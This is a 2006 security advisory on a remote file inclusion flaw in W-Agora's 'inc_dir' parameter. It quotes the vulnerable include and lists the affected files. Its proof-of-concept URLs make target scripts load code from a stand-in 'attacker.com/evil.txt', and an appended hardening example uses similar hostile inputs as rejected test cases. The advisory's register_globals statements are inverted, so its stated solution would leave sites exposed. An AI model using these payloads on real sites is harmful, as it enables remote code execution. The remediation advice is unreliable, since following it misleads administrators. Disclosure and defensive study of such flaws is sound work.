
Echo Security Advisory 2006.34

Posted Jun 27, 2006
Authored by Echo Security, the_day | Site theday.echo.or.id

W-Agora (Web-Agora) versions 4.2.0 and below suffer from remote file inclusion flaws.

tags | exploit, remote, web, file inclusion
SHA-256 | d1e22c145556e20631976cc596ff225ba1e6348491de3416eaa20972fe780b8d

ECHO.OR.ID
ECHO_ADV_34$2006

---------------------------------------------------------------------------------------------------
[ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion
---------------------------------------------------------------------------------------------------

Author : Dedi Dwianto a.k.a the_day
Date Found : June, 20th 2006
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv34-theday-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
W-Agora (Web-Agora)

Application : W-Agora (Web-Agora)
version : <= 4.2.0
URL : http://w-agora.net
Description :

W-Agora (Web-Agora) is a database-driven communications system which allows you and your visitors to store and
display messages, files, and other information on your web site. More than "just another Web BBS/forum software",
W-Agora is designed so it can be easily customizable through a Web browser and the use of templates.
It can be used as a BBS, guestbook, download area, or publishing system.
Several database backends are supported such as MySQL, Postgres, mSQL, Oracle and DBM.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~

-----------------------insert.php----------------------
....
<?php
if ($bn_search && ($bn_doc_type == "static") && ($bn_search_engine != "none") ) {
    // $inc_dir goes into the include path without any validation
    include "$inc_dir/$bn_search_engine.$ext";
    $search->indexNotes();
}

?>
...
----------------------------------------------------------

Input passed to the "inc_dir" parameter in insert.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Affected files:

admin_notes.php
admin_subscribed_user.php
admin_user.php
browse_avatar.php
close.php
create_forum.php
create_site.php
create_user.php
delete.php
delete_site.php
download_forum.php
editconf.php
edit_site.php
export.php
forgot_password.php
index.php
insert.php
search.php
view.php
update.php
setup.php
profile.php
register.php
rss.php
list.php
include/mail.php
include/fileupload.php
include/msql.php
include/dbaccess.php
include/form.php
include/postgres65.php
include/postgres.php
include/mysql.php
extras/quicklist.php
extras/shared_user.php
user/ldap_example.php
tools/upgrade_401.php
tools/upgrade_402.php
tools/upgrade_42.php
tools/upgrade_site_401.php
tools/upgrade_site_402.php

Successful exploitation requires that "register_globals = Off".

Proof Of Concept:
~~~~~~~~~~~~~~~~~

http://target.com/[w-agora_path]/index.php?inc_dir=http://target.com//inject.txt?
http://target.com/[w-agora_path]/search.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/view.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/update.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/tools/upgrade_401.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/include/mail.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/extras/quicklist.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/register.php?inc_dir=http://attacker.com/evil.txt?
http://target.com/[w-agora_path]/rss.php?inc_dir=http://attacker.com/evil.txt?

and the other affected files.


Solution:
~~~~~~~~~
Change register_globals = On in php.ini
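
Added example (not part of the original advisory and not W-Agora code): a code-level hardening of the include shown in insert.php that does not depend on php.ini. The include directory is assigned in code, so a value arriving in the request cannot replace it, and only named modules are loaded. The helper wa_module_path(), the module names and the demo directory are assumptions made for illustration.

```php
<?php
// Added example (not W-Agora code): hardened form of the include in insert.php.
// Module names and the demo directory are constructed for illustration.

// Modules that may be loaded; anything else is rejected (hypothetical names).
const WA_ALLOWED_ENGINES = ['mysql_search', 'dbm_search'];

// Return the real path of an allowlisted module under $base, or null.
function wa_module_path(string $base, $name, string $ext = 'php'): ?string
{
    if (!is_string($name) || !in_array($name, WA_ALLOWED_ENGINES, true)) {
        return null;
    }
    $root = realpath($base);
    $path = realpath($base . '/' . $name . '.' . $ext);
    // realpath() resolves ../ and symlinks and returns false for missing files.
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Demo setup: a constructed include directory holding one stub module.
// $inc_dir is assigned here in code and is never read from the request.
$inc_dir = sys_get_temp_dir() . '/wa_inc_demo';
if (!is_dir($inc_dir)) {
    mkdir($inc_dir);
}
file_put_contents($inc_dir . '/mysql_search.php', "<?php /* stub module */\n");

// Constructed inputs: one valid name, then values that must be refused.
$candidates = ['mysql_search', 'http://attacker.com/evil.txt?', '../../etc/passwd', 'none'];
foreach ($candidates as $bn_search_engine) {
    $module = wa_module_path($inc_dir, $bn_search_engine);
    if ($module === null) {
        echo "rejected: $bn_search_engine\n";
        continue;
    }
    include $module;   // only a vetted local file reaches include
    echo "included: $module\n";
}
```

Only the first candidate is included; the other three are rejected before any file access. The same pattern applies to each file in the affected list that builds an include path from inc_dir.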

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous,kaiten
~ Lieur-Euy,Mr_ny3m,bithedz,an0maly
~ newbie_hacker[at]yahoogroups.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

the_day || echo|staff || the_day[at]echo[dot]or[dot]id
Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------